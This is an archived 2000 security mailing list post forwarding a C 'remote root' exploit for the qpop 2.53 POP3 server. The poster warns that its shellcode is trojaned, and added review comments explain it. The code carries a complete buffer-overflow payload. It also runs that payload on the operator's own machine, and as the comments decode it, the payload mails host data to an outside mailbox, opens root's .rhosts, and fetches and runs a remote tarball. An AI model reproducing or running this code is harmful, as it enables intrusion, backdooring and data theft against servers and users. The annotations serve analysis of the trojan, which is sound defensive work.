Vulnerability Development mailing list archives

QPOP2.5* exploit ??


From: batrox () SWBELL NET (Ryan Sweat)
Date: Sun, 14 May 2000 12:30:03 -0500


     this has been found in the wild; however, there seems to be a trojan in the shellcode.  Popper 2.5* has been 
thought to be safe.  I would not recommend running this on your own machine unless you crack the shellcode and see what 
it does.  

bat

/*  PRIVATE!!!!!!!!! DONT DISTRIBUTE!!!!! PRIVATE!!!!!!!!! 
 *
 *
 *  qpop 2.53 remote root exploit for linux
 *  tested on redhat 6.x and 5.x, and slack7
 *  offsets for redhat 6: 100
 *  redhat 5: 150
 *
 *  slackware: 200
 *
 * these offsets were an average; however, the buffer is small and 
 * the address must be almost exact.  Perhaps try an offset brute forcer.
 *
 * code by John Slockavich, copyright February 25th, 2000
 * this code for educational purposes only
 *
 * 
 *
 * If this exploit is successful, you should have a bindshell on port 1524 
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/tcp.h>
#include <linux/ip.h>

#define RET 0xbffff6b2   /* base guess for the overwritten return address; main() subtracts argv[2] from it */
#define NOP 0x90         /* x86 NOP, fills the first half of the buffer */
#define PORT 110         /* POP3 */
#define BSIZE 512        /* size of the heap buffer that becomes the USER argument */

/* Untyped function pointer.  main() aims it at the shellcode array below
 * (line "(char *)qpop_proc = shellcode;") and quit() calls it, so the payload
 * is executed inside THIS process -- on the machine running the tool -- on
 * every path that reaches quit(), not on the remote popper.  This is the
 * trojan the list post warns about. */
int (*qpop_proc)();
void quit(int x);        /* calls qpop_proc() and then exit(x); defined at the bottom of the file */

/* Payload bytes, used twice: copied into the middle of the network buffer AND
 * executed locally through qpop_proc()/quit().
 *
 * The first 25 bytes are a self-locating decoder: jmp/call/pop to obtain a
 * pointer into the buffer, then (x86) `add esi,0xf; xor ecx,ecx; mov cx,0x18c;
 * xor byte [esi],2; inc esi; loop`.  Everything after it is therefore stored
 * XOR 0x02.  Undoing that XOR by hand, the body is not the "bindshell on port
 * 1524" promised in the header but a "/bin/sh" "-c" command string that, as
 * far as the bytes decode (verify before relying on this): pipes the output of
 * /sbin/ifconfig -a to `mail` addressed to an external hotmail.com mailbox,
 * appends "+ +" to ~root/.rhosts, fetches a tarball with rcp from a host under
 * trdlnk.com, unpacks it, runs a script from it and deletes the directory,
 * ending in an execve.  Treat the hostnames/mailbox recovered from it as
 * indicators, and the array as hostile.
 *
 * NOTE(review): the archive has line-wrapped the literal inside a \x escape
 * (second/third line), so the file as shown does not compile as pasted. */
char shellcode[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66\xb9\x8c\x01\x8
0\x36\x02\x46\xe2\xfa"
"\xeb\x33\x03\x02\x02\x2d\x60\x6b\x6c\x2d\x71\x6a\x02\x2f"
"\x61\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x2d"
"\x71\x60\x6b\x6c\x2d\x6b\x64\x61\x6d\x6c\x64\x6b\x65\x22\x2f\x63\x22\x7e\x22"
"\x6f\x63\x6b\x6e\x22\x2f\x71\x22\x71\x6d\x6e\x75\x63\x70\x22\x67\x76\x61\x6d"
"\x75\x6c\x78\x42\x6a\x6d\x76\x6f\x63\x6b\x6e\x2c\x61\x6d\x6f\x22\x3c\x3c\x22"
"\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x22\x67\x61\x6a\x6d\x22\x25\x29\x22"
"\x29\x25\x22\x3c\x3c\x22\x7c\x70\x6d\x6d\x76\x2d\x2c\x70\x6a\x6d\x71\x76\x71"
"\x39\x22\x70\x61\x72\x22\x6e\x72\x42\x71\x69\x6b\x6c\x6c\x67\x70\x2c\x76\x70"
"\x66\x6e\x6c\x69\x2c\x61\x6d\x6f\x38\x2d\x77\x71\x70\x2d\x71\x72\x6d\x6d\x6e"
"\x2d\x6e\x72\x2d\x6f\x6d\x66\x67\x6e\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63"
"\x70\x22\x71\x6d\x6e\x75\x63\x70\x2c\x76\x63\x70\x39\x22\x76\x63\x70\x22\x2f"
"\x7a\x74\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x22\x3c\x3c\x22\x2d\x66\x67\x74"
"\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x71\x6d\x6e\x75\x63\x70\x39\x22\x61"
"\x6a\x6f\x6d\x66\x22\x29\x7a\x22\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x39\x22"
"\x2c\x2d\x71\x6d\x6e\x75\x63\x70\x2c\x71\x6a\x22\x3c\x3c\x22\x2d\x66\x67\x74"
"\x2d\x6c\x77\x6e\x6e\x39\x22\x61\x66\x22\x2c\x2c\x39\x22\x70\x6f\x22\x2f\x70"
"\x64\x22\x71\x6d\x6e\x75\x63\x70\x28\x39\x02\x83\xee\x65\x29\x02\x02\x57\x8b"
"\xe7\x81\xee\x12\x54\x51\xea\x02\x02\x02\x02\x59\x83\xc1\xb5\x12\x02\x02\x8f"
"\xb1\x07\xec\xfd\xfd\x8b\x77\xf2\x8f\x81\x0f\xec\xfd\xfd\x8b\x47\xf6\x8f\x81"
"\x22\xec\xfd\xfd\x8b\x47\xfa\xc5\x47\xfe\x02\x02\x02\x02\x8f\x4f\xf2\xba\x09"
"\x02\x02\x02\x33\xd0\x51\x8b\xf1\xcf\x82\x33\xc2\x8f\x67\xea\x59\x5c\xcb\xc1"
"\x92\x92";

/* Print the synopsis to stderr and terminate with exit status 1.
 * name: argv[0] as passed by main().  Does not return. */
void usage(char *name) 
 {
      fputs("qpop 2.53 exploit by John Slockavich\n", stderr);
      fprintf(stderr, "Usage: %s <hostname> <offset>\n", name);
      exit(1);
 }

/* Entry point.  argv[1] = target host, optional argv[2] = integer offset
 * subtracted from RET.  Builds a BSIZE-byte buffer (addresses everywhere,
 * first half overwritten with NOPs, the shellcode array copied into the
 * middle) and sends it as "USER <buffer>\n" to port 110.  Every path that
 * gets past buffer construction -- connect() failure, write() failure and
 * success -- ends in quit(), which executes the shellcode array locally.
 * Error paths before that call exit(0), i.e. report success to the shell. */
int main(int argc, char **argv)
{
 
  struct sockaddr_in sin;
  struct hostent     *he; 
  char               *hostname, *ptr, *buff;
  char               sendbuf[BSIZE+20];   /* "USER " + up to BSIZE-1 bytes + "\n" fits */
  long               *addr_ptr, addr;
  int                 rfd;
  int                 sfd;
  int                 i;  
  int                 offset = 0;

   if (argc < 2)
                usage(argv[0]);
 hostname = argv[1];
 if (argv[2])                       /* relies on argv[argc] == NULL; atoi() yields 0 on junk */
            offset = atoi(argv[2]);

/* Cast-as-lvalue is a GCC extension, not ISO C.  This points the global
 * function pointer at the payload bytes; the only caller of qpop_proc is
 * quit(), so this line exists purely to run the payload on the local machine. */
(char *)qpop_proc = shellcode;
if (!(buff = malloc(BSIZE))) {
    perror("malloc");
    exit(0);                        /* note: zero exit status on failure */
  }

  /* sin is never zeroed; only family/port/addr are set */
  sin.sin_family = AF_INET;
  sin.sin_port = htons(PORT);
  if ((he = gethostbyname(hostname)) == NULL)  {
       herror("resolve");
       exit(0);                     /* same: zero exit status on failure */
   }
   bcopy(he->h_addr, (struct in_addr *)&sin.sin_addr, he->h_length); 
   
  
   /* Raw socket: created, never used, never closed.  NOTE(review): SOCK_RAW
    * needs root on Linux, so an unprivileged run stops here -- which also means
    * any run that reaches quit() executes the payload as root. */
   if ((rfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
            perror("socket");
            exit(1);
  }  
  
 if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
           perror("socket");
           exit(1);
  }

  addr = RET - offset;
  /* %x with a long argument: mismatched on LP64, only "works" on ILP32 */
  printf("preparing buffer using addr 0x%x\n", addr);
    
    
  /* Fill: BSIZE/4 iterations, each storing sizeof(long) bytes.  That covers
   * exactly BSIZE bytes only when sizeof(long) == 4; with 8-byte long this
   * writes 2*BSIZE bytes into the BSIZE-byte malloc (heap overflow). */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < BSIZE; i+=4)
    *(addr_ptr++) = addr;

  /* first half becomes a NOP run, second half keeps the repeated address */
  for (i = 0; i < BSIZE/2; i++)
    buff[i] = NOP;

  /* shellcode is centred, overwriting the tail of the NOPs and the head of
   * the address run; strlen() works because the array contains no 0x00 byte */
  ptr = buff + ((BSIZE/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[BSIZE - 1] = '\0';            /* so "%s" below stops inside the buffer */
    
  /* A failed connect() goes through quit(), not exit(): the payload runs
   * locally even when the target host is unreachable. */
  if (connect(sfd, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        perror("connect");
        quit(1);
 }
  printf("connected, sending shellcode...\n");
  snprintf(sendbuf, sizeof(sendbuf)-1,"USER %s\n",buff);

/* write()/close() are declared in <unistd.h>, which this file does not
 * include (implicit declarations).  buff is never freed; the process exits. */
if (write(sfd, sendbuf, strlen(sendbuf)) < 0) {
        perror("write");
        quit(1);
}
 close(sfd);
 quit(0);                           /* success path also executes the payload locally */
}

/* Exit helper and the trojan trigger.  It releases nothing; it calls
 * qpop_proc(), which main() pointed at the shellcode array, so the payload
 * executes in this process with the privileges of whoever runs the tool
 * (root, given the SOCK_RAW check in main()).  main() reaches it on
 * connect() failure, on write() failure and on success, so simply invoking
 * the tool -- even against an unreachable host -- runs the payload.
 * x: intended exit status; exit(x) only runs if the payload returns. */
void quit(int x)
{
     qpop_proc();
     exit(x);
}

